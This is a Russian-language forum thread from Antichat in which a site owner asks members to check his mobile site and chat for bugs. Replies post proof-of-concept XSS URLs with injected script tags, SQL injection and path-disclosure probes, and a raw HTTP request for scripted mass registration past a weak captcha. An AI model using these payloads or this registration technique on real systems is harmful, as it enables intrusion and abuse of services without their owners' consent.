Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   Проверте на баги (https://forum.antichat.xyz/showthread.php?t=100672)

NAGAN 11.01.2009 12:28
Проверте на баги
 
проверти на баги сайт для мобильных телефонов версии xhtml http://wapnn.org и чат http://chat.wapnn.org

NAGAN 11.01.2009 21:44
хм...хоть напишите что кавряли он ничего не на кавыряли а то сидиш как ботиног и ждеш! :(

mr.The 11.01.2009 22:29
Цитата:
Powered by JohnCMS
Цитата:
2. Сайт, заявку на рассмотрение которого вы оставляете должен содержать некую самописную часть.
кагбы б..

NAGAN 11.01.2009 22:51
вот по этому я и попросил проверить! а то что в ШАПКЕ скрипта написано так это остатки от движка! код Двига переделанный полностью! +чат написаный практически с 0! вроде все в рамках положенного!

BlackSun 12.01.2009 07:02
XSS
http://wapnn.org/xxx_gallery/baz.php?f=132x176/Analnyj_seks/sbor1&p=2&ob='><script>alert()</script><noscript>&SID=qq496ab2376ffcbn355
-------------
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1'
------------
XSS
http://wapnn.org/ero_gallery/elem.php?r=240x320&c='>"><script>alert()</script><noscript>&d=11
------------
SQL-INJ и раскрытие путей
http://wapnn.org/sms/index.php?mod=show&cID=10&way=n&aID=-1
раскручивать не стал

NAGAN 12.01.2009 10:27
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1' не понял по поводу этого где там происходит раскрытие путей! за все остальное плюс!

BlackSun 12.01.2009 11:56
Цитата:
Сообщение от NAGAN
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1' не понял по поводу этого где там происходит раскрытие путей! за все остальное плюс!
Ты пройди по ссылке, сохрани "картинку" и открой блонкнотом

TR0J@N 13.01.2009 00:21
Регим армию пользователей)
Ну капча слишком простая, можно либо распознавать, и привязка сессия=КОД_КАПЧИ сохраняется!

Код:
POST http://wapnn.org/registration.php HTTP/1.0
Accept: */*
Referer: http://wapnn.org/registration.php
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0
Host: wapnn.org
Content-Length: 163
Pragma: no-cache
Cookie: SESID=ССЕСИЯ

nick=ЛОГИН&password=ПАСС&imname=ИМЯwd&sex=m&about=тратата&kod=КОД_КАПЧИ&submit=Регистрация

Xcontrol212 13.01.2009 02:28
XSS
Код:
http://chat.wapnn.org/enter.php?ver="><ScRiPt%20%0a%0d>alert(/XSS/);</ScRiPt>&ref=318409

NAGAN 13.01.2009 21:12
Цитата:
Сообщение от BlackSun
XSS
http://wapnn.org/xxx_gallery/baz.php?f=132x176/Analnyj_seks/sbor1&p=2&ob='><script>alert()</script><noscript>&SID=qq496ab2376ffcbn355

XSS
http://wapnn.org/ero_gallery/elem.php?r=240x320&c='>"><script>alert()</script><noscript>&d=11
------------
SQL-INJ и раскрытие путей
http://wapnn.org/sms/index.php?mod=show&cID=10&way=n&aID=-1
раскручивать не стал

хыхых прикол это раскрытие путей и inj на другой сайт! это через граберы! :) тема вообще!


Время: 18:16
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице